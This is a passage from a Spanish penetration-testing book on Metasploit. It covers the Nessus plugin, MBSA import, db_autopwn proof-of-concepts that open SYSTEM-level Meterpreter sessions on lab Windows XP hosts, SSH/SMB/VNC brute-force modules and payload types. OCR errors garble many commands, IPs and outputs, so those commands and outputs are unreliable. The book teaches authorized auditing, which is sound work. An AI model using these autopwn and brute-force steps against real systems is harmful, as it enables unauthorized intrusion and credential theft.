Tras obtener el email con el código de activación se deben seguir las instrucciones que acompañan al 
correo electrónico para llevar a cabo el proceso de registro. Tras la activación se recomienda añadir 
un usuario mediante el uso del comando nessus-adduser que se encuentra en la ruta /opi/nessus/sbin, 
o accediendo mediante un navegador а la dirección https.//localhost:8834. 


psf > load nessus 

[*} Nessus Bridge for Metasploit 1.1 

'+1 Type nessus_heip for a command listing 

a Creating Exploit Search Index - (/root/.msf3/nmessus index) - this wont take 
ong. 

| 

[+1 It has taken : 9.806075368999999 seconds to build the exploits search index 
{*1 Successfully loaded plugin: пеѕѕиѕ 

nsf > nessus connect localhost 


^+ Username: 


sf 
iat Password: 
123abc. 
[+] Connecting to https://localhost:8834/ as msf 
[+] Authenticated 
msf > 


Fig 2.12: Cargar plugin nessus en Metasploit. 


Estos son los comandos más interesantes disponibles con el plugin de nessus en Metasploit. 


Comando | Descripción 
nessus connect Realiza la conexión con el servidor de nessus | 
nessus policy list Muestra las políticas de auditoría que se ericuentran creadas 


Permite realizar un nuevo escaneo de vulnerabilidades. Ejemplo: 
nessus_scan_new <identificador de política> <nombre del reporte> 
<dirección ІР> 


nessus scan_ new 


nessus_scan_status Muestra el estado del proceso 


nessus_sean_ stop Para un escaneo en concreto que actualmente está siendo ejecutado 


nessus_scan_stop_all | Para todos los escaneos que se encuentran en ejecución 


nessus_report_list Lista los reportes disponibles, útil para obtener los identificadores 


Muestra información sobre un reporte en concreto. Ejemplo:nessus 


nessus_report_get ЫА 
pori ғерогі веі <identificador> 


Muestra posibles exploits que pueden ser lanzados sobre la máquina 


nessus_report_exploits remota 


Los comandos  nessus report hosts, — nessus_report_host_ detail, 

nessus_report_host* nessus_ report host ports proporcionan información detallada al 

auditor sobre las máquinas, puertos, protocolos, etcétera | 
Tabla 2.04: Comandos del plugin de nessus. 


msi > nessus poticy list 
ivi Nessus Policy List 


ID Name Comments 
+4 Web App Tests 

-3 Prepare for PCI-DSS audits (section 11.2.2) 

-2 External Network Scan 

-1 Internal Network Scan 


msf > nessus_scan_new -1 msf_prueba 192,168.11.108 

¡+1 Creating scan from policy number -1, called "msf _prueba" and scanning 192.1 
8.11.109 

{+} Scan started. uid is 602ecbbd-217c-2fa6-1096-b31ddd90911921566f389122153d 
msf > 


Fig 2.13: Consulta de políticas y lanzamiento del escáner. 


Una vez conectado con el servidor de nessus, se ha autenticado y se ha lanzado el escáner sobre un 
objetivo, se puede almacenar la información en una base de datos como se vio en el punto de птар. 


msf > db driver 
1%) Active Driver: postgresql 
i] Available: postgresql, mysql 


msi > db_connect postgres:123abc.4127.0.8. 1/пеѕзиѕ Б 
NOTICE: "CREATE TABLE will create implicit sequence “hosts_id вед" Тог serial co 


илт: “hosts. id” 

NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index “hosts pkey" for 
table “hosts” 

NOTICE: CREATE TABLE will create implicit sequence "clients id seq" for serial 
column "clients. id" 


Fig 2.14: Creación de base de datos para almacenar información de nessus. 


Tras lanzar el escaneo sobre el objetivo se puede recoger el reporte y mediante el uso del identificador 
que dispone éste realizar distintas acciones, como pueden ser listar posibles vulnerabilidades 
encontradas en las máquinas remotas, obtener información sobre puertos abiertos, protocolos 
utilizados en dichas máquinas, obtener gran detalle sobre el sistema operativo de las ináquinas 
remotas y versiones de los servicios, ver que exploits están disponibles para ser lanzados, etcétera, 


> nessus report list 
la, Hess Report List 


10 Name Status Data 


“ass = renave 


5ozecbbd- 217c-2fa6-1086-b31ddd90311921566f389122159d4 msf_prueba SE 65:0 05 Jun 11 2012 


[+] you сап: 

Ыы Get а list of hosts from the report: nesstis_report_hosts <report id> 

msi > nessus_report get 602ecbbd-217c-2fa6-1026-b31ddd96a11921565f3e9122159d 

[+] importing 602ecbbd-217c-2fa6-1036-b31ddd90911971566f3e9122159d 

[*] 192.168,11.1688 Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3 5 
"не! 

+= [ Done 

№1 > nessus_report_exploits 60zecbbd-217c-2fa6-1896-b31dd490311921566f3e9122159d | 
[+] Examining 602ecbbd-217c-2fa6-18a6- b31ddd490211921566f3e9122159d 

{+} Experimental, trust but verify EN 


192.168.11.108 | Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3144 

5 | NSS-26920 | Sev 2 ] ["windows/http/edirectory_host"] 

те 160,11,108 | Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3 | 44 
3 | NSS-19394 | Sev 1 | ["windows/smb/psexec"] 

192.168,11.108 | Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3 la 

| NSS-16114 | Sev 1 | [“windows/oracle/tns_arguments"] 

asf > 


Fig 2,15: Gestión de reportes. 
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Existen más comandos del plugin de nessus, los cuales proporcionan configuración básica у, 


avanzada del servidor de la herramienta, y todo ello desde el entorno de Metasploit. Estos comandos 


pueden ser útiles para gestionar y configurar el escáner correctamente, pero este proceso escapa de$ 


los objetivos del presente libro. 


Escáner MBSA e importación de datos 


Microsoft Baseline Security Analyzer, о MBSA, es una herramienta que permite a los profesionales 


ТІ y auditores determinar el estado de seguridad según las recomendaciones de Microsoft. Con 
esta herramienta se pueden detectar los errores más comunes de configuración en la seguridad de 
los sistemas operativos de Microsoft y la falta de actualizaciones en el sistema operativo que se 
encuentran por instalar, siempre hablando de productos de la compañía de Redmond, 


{ 


Ы x ГД e Ф ж [4 Ї 
3ste escáner dispone de una interfaz gráfica y de un cliente de línea de comandos. El cliente de linea 
Че comandos es más versátil y proporciona un mayor número de funcionalidades al auditor. Una de : 


аз más interesantes es la posibilidad de exportar a un fichero XML la información recogida por el 
escáner. 


Este documento puede ser importado a Іа base de datos de Metasploit directamente a través del 
comando db_import, previa conexión del framework a la base de datos. Una vez el fichero es 


importado a la base de datos se puede acceder a dicha infor mación a través de los comandos de tipo . 


db_* que se han estudiado en este capítulo. 


La conclusión final que debe quedar al auditor es la facilidad para importar los resultados de otros 


escáneres a Metasploit y el tratamiento de dicha información, gracias a la flexibilidad del framework, | 


para avanzar en el test de intrusión. 


Técnica Autopwn 

La funcionalidad autopwn permite al auditor automatizar el proceso del test de intrusión. El auditor 
realizará un análisis o escaneo sobre una red y en función de los resultados, атори, lanzará una 
serie de exploits que pueden provocar la obtención de acceso remoto al sistema vulnerable, 


Ашорут se apoya en una base de datos, la cual en este capítulo se ha visto como crear y como 
conectar con ella, para recoger la información que utilizará para lanzar una cantidad de exploits con 
el objetivo de aprovechar alguna vulnerabilidad conocida sobre los servicios que pueden disponer 
las máquinas remotas. Si autopwn explota alguna vulnerabilidad puede devolver el control de la 
máquina remota, por ejemplo, proporcionando una sesión de meterpreter o una shell remota. 


El potencial que proporciona esta funcionalidad es enorme ya que se pueden utilizar la información 
recogida con distintos escáneres, por ejemplo nessus o nmap, utilizando la importación mediante 
archivos o incluso la integración de la herramienta con el framework automáticamente, Una vez 
elegida la manera de trabajar, autopwn realizará el resto. 


1 


E 
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El comando para interactuar con la funcionalidad es db_autopwn. Hay que tener en cuenta que en 
algunas versiones de Metasploit, se está deshabilitando esta funcionalidad, por lo que se recomienda 
al auditor que tenga cuidado al actualizar el framework, si no quiere perder dicha funcionalidad. Este 
comando dispone de los siguientes parámetros que aportan distintos comportamientos. 


Parámetro Descripción y ejemplo 


Muestra todos los módulos de tipo exploit que se están lanzando 
Каан енн аана КДРА СВЕДЕ КЛОН ЫЫ АНЫ аа дыны 


Ашорит selecciona los módulos de tipo explo! en función de las posibles 
vulnerabilidades encontradas 


Autopwn selecciona los módulos de lipo exploit en función de los puertos y 
servicios abiertos | 


Lanza exploits contra los objelivos marcados 


Utiliza una shell inversa cuando se consigue acceso 


—————-——— 


Utiliza una shell directa con un puerto aleatorio por defecto 


Deshabilita la salida de los módulos de tipo exploit 


Sólo lanza los módulos que dispongan de un rank minimo. Se debe especificar el 
rank, por ejemplo excellent 


-q 


-PX <range> 


Sólo se lanzarán los exploits sobre los equipos que se encuentren en el rango. Se 
debe especificar el rango después del parámetro 


Excluye los equipos que se encuentren en el rango de ser probados mediante el 
lanzamiento de exploits 


Sólo lanza los exploits sobre las máquinas que dispongan de los puertos abiertos 
que se especifica en el rango 


Se excluyen los equipos con los puertos abiertos que se indican en el rango, por 
lo que no serán probados mediante exploits 


Tabla 2.05: Parámetros de db_autopwn. 


PoC: птар + Autopwn 

En la siguiente prueba de concepto se va a realizar una conexión a una base de datos local con 
Metasploit, después se utilizará la integración de птар con el framework para realizar un 
descubrimiento de máquinas sobre una red, obteniendo entre otros valores los puertos abiertos 
de dichas máquinas. Por último, se lanzará la funcionalidad aufopwn con el objetivo de probar la 
fortaleza y seguridad de los equipos de esa red, la cual es objeto de estudio. 


En primer lugar, tras lanzar msfconsole, se conecta el framework a la base de datos y se lanza un 
птар sobre la red de estudio. La información de nmap queda almacenada en la base de datos, la cual 
puede ser recuperada en cualquier instante, por si fuera necesario. Las opciones con las que птар 
sea lanzado queda en manos de la imaginación, necesidad y creatividad del auditor. 
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sf > 00 соппесї postgres:123abc.6127.0.0.1/test_libro 
f > db_nmap -sS 16.0.0.0/24 
[+] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-06-13 05:35 CEST 
[*] Nmap: Nmap scan report for 180.9.8.1 

{*] Nmap: Host is up (6.9000345 latency). 

[+] Nmap: Not shown: 999 closed ports 

[+] Nmap: PORT STATE SERVICE 

[+] Nmap: 111/tcp open rpcbind 

[+] Nmap: Nmap scan report for 19.0.8.190 

[*1 Nmap: Host is up (0.00125 latency). 

[+] Nmap: Not shown: 997 closed ports 

{*] Nmap: PORT STATE SERVICE 

[+] Nmap: 135/tcp open msrpc 

[+] Nmap: 139/tcp open netbios-ssn 

[+] Nmap: 445/tcp open microsoft-ds 

[*] Nmap: MAC Address: 08:00:27:44:A9:3D (Cadmus Computer Systems) 

[+] Nmap: Nmap scan report for 10.0.0.110 

[+] Nmap: Host is up (0.9011s latency}. 

[*] Nmap: Mot shown: 997 closed ports 

[*] Nmap: PORT STATE SERVICE 

[+] Nmap: 135/tcp open msrpc 

[*] Nmap: 139/tcp open netbios-ssn 

1 Nmap: 445/tcp open microsoft-ds 

‚ МАС Address: 08:90:27:E9:43:A5 (Cadmus Computer Systems) 

. Nmap done: 256 ІР addresses (3 hosts up) scanned іп 31.34 seconds 


Fig 2.16: Conexión a la base de datos y escanco соп птар. 


Ahora se dispone de lo necesario para lanzar autopwn sobre los equipos que se requiera. Hay que 
tener en cuenta qué se necesita o lo que se requiere, por lo que no está de más disponer cerca los 
parámetros de autopwn y decidir sobre qué equipos se lanza, quizá no sea necesario lanzarlo sobre 
todos los equipos que forman parte de la red, o quizá se requiera sólo sobre algunos de ellos que 
disponen de ciertos servicios y no sobre todos. Por lo que de nuevo el auditor debe elegir la mejor 
acción en función de las necesidades del test de intrusión. 


sf > db hosts 


мас 


к-н. taa 


oppakke DRAWA a aa 1 Te A l 


08:0@:27;А4:А9:30 
08:00:27:Е9:43:А5 


msf > db _autopwn -p -t -e -r -I 19.0.0,180-19.0.0.109 


Fig 2.17: Lanzamiento de autopwn sobre un rango de equipos. 


Tras el lanzamiento de autopwn loca esperar hasta que la recolección y ejecución 
termine. Cuanto mayor sea el número de máquinas mayor tiempo llevará el proceso ИР. 
En algunos rincones de Internet se denomina, coloquialmente, a aulopwn como la m 10 : 
Metasploit por el efecto arrasador que provoca en un test de intrusión. Hay que recordat н 


de ре? 
jiel 
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más puristas indican que el test de intrusión debe estar siempre controlado y saber que exploits se 
ejecutan en cada momento, a la vez que no probar algo si no se tiene la certeza de que puede existir 
una vulnerabilidad. Autopwn rompe con estas sentencias о consejos, por lo que es el lector el que 
debe elegir si utilizar esta funcionalidad en el mundo profesional. 


`1 (51/51 [0 sessions]): Waiting on 24 launched modules to finish execution... 
*j Meterpreter session 1 opened (10.0,0.1:32123 -> 10.0.0,100:1064) at 2012-06-13 05:57:18 +020 


i 
| 


0 
е) (51/51 [1 sessions]): Waiting оп 12 launched modules to finish execution... 


[lvl (51/51 [1 sessions]): Waiting on 9 launched modules to finish execution... 
e QU LES ТС 


Fig 2.18: Obtención de sesión inversa con un sistema objetivo, 


PoC: nessus + Autopwn 

Un la siguiente prueba de concepto se va a realizar la conexión con la base de datos y se utilizará 
la herramienta nessus para escanear una red en busca de vulnerabilidades. nessus se utilizará desde 
ms/console gracias а la integración de éste con el entorno como se ha podido estudiar en este capitulo. 


En primer lugar, se debe conectar con la base de datos con el comando db_connect como se ha 
realizado en la prueba de concepto anterior. Hay que tener en cuenta que para utilizar nessus 
integrado con Metasploit se debe cargar el plugin mediante la instrucción load nessus en la sesión 
de msfconsole. Una vez disponibles los comandos de nessus en la sesión en curso de msfconsole se 
debe conectar con el servidor del escáner mediante el uso de пеѕғиѕ соппесі <dirección servidor>. 


Se debe tener claro qué política se utilizará para realizar el escaneo, en este ejemplo se utilizará 
una creada previamente en nessus cuyo nombre es msf_libro. Para lanzar el escaneo utilizando 
esta política se utilizará el comando nessus_scan_new <id política> <nombre escaneo> <red o 
equipo>., 


. > hessus policy list 
Nessus Policy List 


10 Name | Comments 


na +. 


-4 Web App Tests 
13 Prepare for PCI-DSS audits (section 11.2.2) 
-2 External Network Scan 

-1 Internal Network Scan 

1 msf_libro 


нтте т 


msf > пеѕѕиѕ ѕсап пем 1 msf_red 10.0.0.8/24 


ы, Creating scan from policy number l, called "msf_red" and scanning 10.0.8.9/ 


[*] Scan started. uid is afal61d6-bb4d-cb8f-9c35-58c6b50c6638893c4e087d0%ee37 


Fig 2.19: Listado de políticas y ejecución de un escaneo en función de la política. 


El escaneo puede llevar bastante tiempo, en función de lo que se compruebe. Metasploit no bloquea 
la sesión de msfconsole, lanza el proceso en segundo plano y en cualquier momento se puede 
comprobar en qué estado se encuentra el escaneo con el comando nessus scan status. 
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sf > nessus scan status 
r+: Running Scans 


can 10 Name Owner Started Status 
Current Hosts Total Hosts 


afal61d6-bbad-cb8?-9c35-58c6b50c66388YAC4e087d89ee37 msf red msf 06:39 Jun 13 2812 running 


nessus_ report get <reportid> 


Import Nessus report to database : 
hessus_scan_pause <scanid> 


Pause а nessus scan : 


Fig 2.20: Información sobre el estado del proceso lanzado desde nessus. 


hora para importar los resultados del reporte a la base de datos se puede utilizar el comando 
nessus_report_get <id report>, La importación de datos puede llevar su tiempo debido a la cantidad 
de información de la que se disponga en el reporte original. 


st 


5 


> nessus report 
j-i N 


essus Report List 


Date 


Name Status 


10 


7967814a-6lee-b5c1-9aba-9359b641741b783e8c583654af6bc msf running 07:95 Jun 13 2012 
аЇа16116-ҺЬЫ4@- св #-9с35-58с6050с663889ас4е087(109ее37 msf_ red completed 06:43 Jun 13 2012 
1able39f-1b1d-baf5-cecl-73cac4e78Bb324b2033debf840423 msf running 87:64 Jun 13 2012 
502ecbbd-217c-2fa6-1096-b31ddd90811921566f3e9122159d msf prueba completed 05:05 Jun 11 2012 


[*] You сап: 
[+] Get a list of hosts from the report: nessus_report_hosts <report id> 

msí > nessus_report_get afa161d6-bb4d-ch8f-9c33-58c6h50c663889ac4e087d0%ee37 

J+} importing afal61d6-hb4d-cb8f-9c35-58c6h50c6638B89ac4e087d09ee37 

{*} 10.8.0,110 Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3 Dana! 
[+] 10,0,0,198 Microsoft Windows XP Service Pack 2 or Microsoft Windows XP Service Pack 3 Deng! 
[+] 10,0.0.1 Linux Kernel 2.6.38 on Ubuntu 18.94 / г 


Fig 2.21; Importación de resultados de un reporte de леўуиз, 


ste es un buen momento para refrescar los comandos db_hosts, db_services, db_vulns y ojear Іа, 
información que se dispone en la base de datos. Una vez que el auditor esté preparado para lanzar 
autopwn y crea que éste puede tener éxito sobre los equipos remotos, se lanzará la funcionalidad * 
contra los equipos. 


[є] {189/169 [3 sessions]): Waiting on 15 launched modutes to finish execution... 
Гер (169/169 [3 sessions]): Waiting on 14 launched modules to finish execution... 
[+] {169/169 (3 sessions)): Waiting on 14 launched modules to finish execution... 
[+] (169/169 (3 sessions)): Waiting on 13 launched modules to finish execution... 
[+1 The autopwn command has completed with 3 sessions 

[*] Enter sessions -i (10) to interact with a given session ID 


meterpreter xB6/win32 НТ AUTHORITYASYSTEM Q PRUEBAS-B1768CC 10.0.8.1:24947 -> 19.9.9.180 


meterpreter x96/win32 NT AUTHORITYASYSTEM @ PRUEBAS-681769CC  168,0.0.1:4652 -> 18,0,9,190: 


meterpreter x86/win32 NT AUTHORITYASYSTEM @ PRUEBAS-61769CC  10.9.8.1:35313 -> 10.9,0.110 


Fig 2.22: Obtención de sesiones con autopwn. 
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4, Escáneres dirigidos a servicios 


А veces puede ser realmente interesante para el auditor centrarse en uno o varios servicios concretos 
y obtener la máxima información de ellos que se pueda. En este apartado se van a estudiar 
herramientas que se disponen en el framework que tienen por objetivo el especificado anteriormente. 


El objetivo 

Es realmente importante conocer las versiones de los productos y el estado de éstos. Hoy en día 
una configuración por defecto o una mala configuración también pueden ser signos de posibles 
problemas de seguridad graves. Es cierto que cuanta más información se disponga del objetivo, las 
posibilidades de éxito en el test de intrusión aumentan. 


Una vez que se dispone de este tipo de información, que puede ser más útil de lo que a priori a 
cualquier usuario, incluido los administradores, les pueda parecer es posible realizar la búsqueda de 
exploits para las versiones de los productos localizados en el análisis del entorno. 


Google, conocido por todo usuario de Internet, es uno de los mayores buscadores de exploits al que se 
puede acceder. Simplemente realizando búsquedas con palabras mágicas como exploit <producto> 
<versión> se pueden obtener resultados sorprendentes, consiguiendo por supuesto el exploit que se 
requiere, Pero esto es una práclica que un usuario de Internet realizaría ante una búsqueda requerida 
de cualquier cosa. 


Otras fuentes interesantes sobre exploits con grandes bases de datos son: 


- —http:/www.exploit-db.com. La cual proporciona gran cantidad de información sobre 
exploits organizados por categorías como locales, remotos, web, etcétera. Como curiosidad 
indicar que en algunos exploits se proporciona también el ejecutable de la versión del 
producto vulnerable. También disponen de una dirección para descargar exploits escritos por 
Metasploit directamente, http://www.exploit-db.com/author/?a=32 11. 


-  htip://packetstormsecurity.org. Otra de las grandes referencias en sitios web de seguridad. 
Actualización diaria de exploits con toda la información detallada sobre las vulnerabilidades. 


- http: //www.securityfocus.com. Siempre actualizada y con la información detallada, un 
sitio web que no puede faltar en los favoritos de nadie. Recomendable el uso de sus listas 
para estar siempre informado. 


Herramientas auxiliary en Metasploit 

Metasploit dispone de distintos módulos de tipo auxiliary con los que se puede obtener diversa 
información sobre servicios y máquinas remotas. En este apartado se muestran algunos ejemplos 
de cómo obtener información valiosa realizando una serie de pruebas sobre los servicios remotos. 


Para empezar se exponen 2 módulos que ayudarán al auditor a obtener la versión de un servidor 
FTP remoto. La primera herramienta o módulo que se utiliza es auxiliary/scanner/fip/fip_version. 
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Su configuración es realmente sencilla, se indica el FTP remoto en la variable RHOSTS, el puerto 
por el que escucha el FTP. 


duxitiary(ittp version) > use auxillary/scanner/ftp/Ttp_version 
sf auxiliary(ftp_version) > set RHOSTS. захир. es 
RHOSTS => TARA es 
msf auxiliary(ftp_version) > run 


[*] 85.80.0. 44:21 FTP Banner: ‘228 ProFTPD 1.2.8 Server (ProFTPD Default installation) [mee 
esjix0dix0a' 

Scanned 1 of 1 hosts (160% complete) 

Auxiliary module execution completed 

{ suxiliary(ftp version) > Ё 


[=] 
19] 


z 


Fig 2.23: Detección de versión de un servidor FTP. 


Otra herramienta que se puede utilizar es uuxiliary/scanner/fip/anonymous con la que mediante el 
uso del usuario anónimo se puede detectar la versión del servidor FTP. 


Existen distintos módulos auxiliary para el servicio SSH. El primero que se explica permile 
obtener de manera rápida la versión del servicio remoto. La ruta de esta herramienta es auxiliay/ 
scanner/ssh/ssh_version y es bastante sencillo de configurar, se indica la máquina remota y se lanza 
el módulo. 


maf auxiliaryissh login) > use auxiliary/scanner/ssh/ssh_version 
msf auxiliary(ssh_version) > run 


[+] Eh Men. 4.:22, SSH server version: SSH-2.0-OpensSH_5.1p1 Debian-5 
[*] Scanned 1 of 1 hosts (190% complete) 
[*] Auxiliary module execution completed 
asf auxiliary(ssh_version) > 


Fig 2.24: Detección de versión de un servidor SSH | 


Existen otras herramientas muy interesantes para realizar fuerza bruta sobre el servicio SSH. La 
primera se encuentra en la ruta auxiliary/scanner/ssh/ssh_login y permite realizar fuerza bruta а 
cuentas de usuario que se puedan entrar en el sistema mediante autenticación de login y password. 
A este módulo se le puede configurar un diccionario de claves y una lista de usuarios e ir probando 
las posibles combinaciones, Además, comprobará la posibilidad de autenticarse en el sistema con 
clave en blanco, una mala configuración en un servidor. La segunda herramienta se encuentra en la 
ruta auxiliary/scanner/ssh/ssh y permite realizar fuerza bruta a usuarios que se autentiquen mediante 
el uso de certificados. En otras palabras, se dispone de una clave privada, obtenida de algún modo, 
posiblemente fraudulento, y se va probando con los distintos usuarios que se especifiquen. 


El servicio SMB, Server Message Block, también dispone de herramientas con las que se puede 
obtener información útil para poder utilizarlas durante el ataque. En la ruta auxiliary/scanner/smb/ 
smb version se dispone de un escáner con el que se puede detectar la versión del sistema operativo 
dónde se encuentra el servicio SMB. Si Metasploit estuviera conectado a la base de datos, los 
resultados obtenidos de estos escáneres actualizarían los valores de dicha base de datos. La prueba 
se puede realizar de la siguiente manera: tras lanzar el escáner se puede realizar ийа consulta, por 
ejemplo con la instrucción db_hosts —c name,os_sp,address. Se puede anexar más columnas en 
función de la información que se quiera recuperar de la base de datos. 


maf suxiliary(ssh_login_pubkey) > use ОТТ Т euxiliary(ssh_login _pubkey) > use auxiliary/scanner/smb/smb _ version =7 
Bst auxiliary(smb _version) > show options | 
Module options (auxiliary/scanner/smb/smb version): 
Name Current Setting Required description | 
RHOSTS yes The target address range or CIOR identifier 
SMBDomain WORKGROUP по The Windows domain to use for authentication 
SMBPass no The password for the specified username 
SMBlUser no The username to authenticate as 
THREADS 1 уеѕ The number of concurrent threads 
asf auxiliary(smb_version) > set RHOSTS 16.0.8.109 
RHOSTS => 18.8.0.109 
msf auxiliary(smh version) > run 
[+] 10.0.0.109:445 is running Windows XP Service Pack 3 (Language: Spanish) (name:PRUEBAS-01760€ 


С) (domain: GRUPO TRABAJO) 
1%] Scanned 1 of 1 hosts (100% тС ЗИНИН 
[*]_ Auxiliary module execution com тС ЗИНИН 


Fig 2.25: Detección de versión de sistema operativo y SMB. 


Este tipo de escáneres orientados a un servicio concreto son más silenciosos que los escáneres que 
analizan un gran número de servicios o recursos, por lo que si se necesita evitar un análisis masivo 
y ruidoso, estas herramientas son esenciales. 


En la ruta auxiliary/scanner/smb/smb _login se encuentra la aplicación que permite realizar una 
prueba de fuerza bruta sobre el protocolo SMB. Se le puede especificar un fichero con usuarios 
y contraseñas, configurarle para que se comprueben los passwords en blanco, nombres de usuario 
‚ Utilizados como contraseñas, etcétera. Además, si Metasploit se encuentra conectado a una base 
de datos este módulo registrará en ésta los login satisfactorios y sobre qué máquinas ocurrieron. 
Directamente, también se puede probar con usuario y contraseña, y por contraseña también se 
entiende un hash LM y NT. 


Otra herramienta para obtener información sobre el servicio SMB es auxiliary/scanner/smb/smb_ 
enumshares, la cualpermite determinar que recursos compartidos son proporcionados por SMB en 
una о en un conjunto de máquinas remotas. La herramienta auxiliar y/scaner/smb/smb_enumusers 
deiermina que usuarios locales existen en la máquina remota. 


Para el servicio VNC se dispone de las herramientas auxiliary/scanner/vnchne_login y auxiliar y/ 
scannerfvacinc_none_auth. La primera realiza un ataque de fuerza bruta sobre un servicio VNC, 

como en las anteriores herramientas se le puede pasar un fichero con usuarios, contraseñas, prueba 
de contraseñas en blanco, etcétera, La segunda herramienta permite saber si un servidor VNC 
permite іа autenticación sin contraseña. Puede parecer extraño encontrarse con algo así, pero una 
mala configuración, un servidor olvidado en el entorno, un fallo por parte de un administrador puede 
levar a esta situación. 


Existen gran cantidad de herramientas para muchos servicios, simplemente se debe buscar en la ruta 
auxiliary/scanner. Herramientas para HTTP, MySQL, netbios, NFS, Oracle, Postgres, SAP, SIP, 
SNMP, etcétera. Como se puede ver Metasploit proporciona gran cantidad de pequeñas utilidades 
para realizar una exploración y análisis de servicios sin desplegar ruido sobre el entorno. 
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Capítulo II. El arte de la intrusión 


Capítulo Ш 
El arte de la intrusión 


1. Ámbito 


El presente capítulo explica la fase de explotación de vulnerabilidades mediante el uso de Metasploit, 


En esta fase el auditor, tras analizar la información obtenida y las posibles vulnerabilidades 
encontradas, lanzará uno o varios exploits con el objetivo de lograr acceso a un 1 sistema informáticod 
remoto o información a la que no tiene un acceso autorizado. ( 


Esta fase necesita que el auditor disponga del framework actualizado con exploits recientes, 105 
cuales pueden ser btenidos а través de Internet, Cuanto mayor número de exploits recientes se tenga i 
más posibilidades existen de disponer de 1а Have que proporcione el éxito еп el test de intrusión. 


Ж { 
Además, se debe estar informado sobre las vulnerabilidades que aparecen diariamente sobre los 
sistemas, ya que esto puede ayudar a encontrar pequeños айе en los mismos, aunque sef 
encuentren actualizados casi diariamente. 


La elección del payloud es algo fundamental y crítico a la hora de- ген la explotación de una 
sistema. El auditor debe elegir el contexto en el que se moverá, es decir, si utilizará un payload para. 
fa fase de post-explotación, o por el contrario, le basta con conseguir una skell sobre un sistema 
concreto y demostrar la vulnerabilidad del sistema. Existe gran variedad de funcionalidades base 4 


para los payloads, las cuales podrán estudiarse en el presente capítulo, 


Por otro lado, hay que comentar que la explotación de un sistema puede ir acompañado de la į 
interacción de un usuario con el atacante, por ejemplo a través de una conexión a un servidor web, 

o la no interacción de la víctima con el atacante. Por ejemplo un usuario no dispone de un servicio * 
actualizado o correctamente configurado, Es bastante lógico, y así se entiende que un ataque sin 
interacción de la víctima provoca mayor temor por parte de los usuarios, pero hoy en día es igual de 
factible y temible un ataque con interacción, ya que un usuario normal utiliza links para acceder a 
mucha información en su día a día, y son aquellos links los que pueden llevarle a cualquier lugar de 
Internet inesperado, por ejemplo un servidor web que lance exploits sobre el equipo de la víctima. 


Y 


Por último destacar, que en muchas ocasiones la explotación de vulnerabilidades puede llegar a ser 
frustrante, ya que puede parecer que no se encuentra la vía de acceso para realizar la explotación, 
о que incluso no existe un exploit que aproveche esa vía. Se recomienda a los lectores que tengan 
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paciencia, realicen un estudio y análisis de los sistemas exhaustivo y que en muchas ocasiones el 
camino más corto hacia el objetivo no es el mejor, y estudiando un camino alternativo se puede 
lograr mayor éxito en el test de intrusión. 


Como ejemplo práctico se indica el siguiente: se debe probar la seguridad de un equipo con Windows 
7, y se dispone de conectividad directa desde el equipo del auditor, pero por mucho que se lanzan 
exploits no se logra vulnerar el equipo. Tras analizar el segmento en el que se localiza el equipo 
objetivo, se encuentran equipos con sistemas operativos Windows AP, los cuales se detecta que son 
vulnerables. 


Tras aprovechar estas vulnerabilidades son controlados remotamente, y se puede obtener información 
valiosa de ellos, como por ejemplo, un listado de usuarios y hashes, фу si esos usuarios se encuentran 
en el equipo con Windows 7? Ya se dispondría de acceso al equipo objetivo. No se ha utilizado el 
camino más corto, pero por un camino alternativo se ha obtenido el éxito en la prueba de intrusión. 


2. Payloads 


Los payloads son uno de los protagonistas de este libro y de los test de intrusión. Ellos aportan el 
éxito o el fracaso en muchas de las pruebas que se pueden realizar en el proceso. Son la esencia del 
alaque, la semilla que se ejecuta en el interior de la máquina remota y proporcionará al atacante o 
auditor el poder de controlar el sistema remoto. 


Existen distintos tipos de payloads como son los singles, stagers y staged. Estos diferentes tipos 
permiten gran versatilidad y pueden ser de gran utilidad en numerosos escenarios posibles. 


Los paylaod de tipo single, también conocidos como inline, son autónomos y realizan una tarea 
concreta o específica. Por ejemplo, bind a una shell, creación de un usuario en el sistema, ejecución 
de un comando, etcétera. 


Los payload de tipo stagers se encargan de crear la conexión entre el cliente y la víctima, y 
generalmente, son utilizados para descargar payloads de tipo staged. 


Los payload de tipo staged se descargan y son ejecutados por los de tipo stagers y normalmente 


son utilizados para realizar tareas complejas o con gran variedad de funcionalidades, como puede > ` 


ser, un melerpreter. En otras palabras los de tipo staged utilizan pequeños stagers para ajustarse 
en pequeños espacios de memoria dónde realizar la explotación. La cantidad de memoria que se 
dispone para realizar la explotación, en la mayoría de los casos, está limitada. Los stagers se colocan 
en este espacio y realizan la función necesaria para realizar la conexión con el resio del payload, de 
tipo staged. 


Todos los exploits en Metasploit utilizan exploit/multi/handier. Este módulo es capaz de gestionar . 


y manejar cada uno de los exploits que se encuentran en el framework, sin importar la conexión o 
el tipo de arquitectura. Este módulo está diseñado de tal forma que sabe como tratar cada tipo de 


, 
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: payload porque еп su configuración se le dice que debe esperar. Cuando el auditor se encuentra 


con un módulo cargado, previo uso del comando use, llega un momento en el que se debe elegir el 
рауіоаа, соп la instrucción set PAYLOAD <ruta payload>, y es en este punto cuando implícitamente 
se Пата a exploit/multi/Mhandler de manera transparente al auditor. En otras ocasiones, puede ser que 
se deba utilizar explícitamente a exploit/multi/handler para manejar y gestionar las posibles sesiones 


remotas. 


Para visualizar todos los payloads disponibles en el framework se dispone del comando show 
payloads ejecutado desde la raíz de msfconsole. Si se ejecuta este comando una vez se encuentra 
cargado un módulo concreto, sólo se mostrarán los payloads válidos para dicho тоа шо, siempre y 
cuando el desarrollador del módulo así lo haya especificado. 


La ruta donde se encuentran fisicamente estos payloads, (hay que tener en cuenta que en el libro 
se utiliza BackTrack), es /pentest/exploits/framework3/modules/payloads donde se organizan los 3 
tipos por carpetas con los nombres de éstos. 


Otra de las cosas que hay que tener en cuenta cuando se listan los distintos payloads es la propiedad 
NoNX y NX. El NX bit es una característica de los procesadores modernos para prevenir la ejecución 
de código en ciertas áreas de memoria. Por ejemplo, en sistemas Windows NX es implementado 
como DEP. Si se ve esta característica en algún payload del listado significa que ese código está 
preparado para evadir el DEP, 


Los payloads que indican ІРуб en la lista indican que están preparados para funcionar en redes IPv6. 


normal Windows MessageBox | 
.hermal Windows Meterpreter 


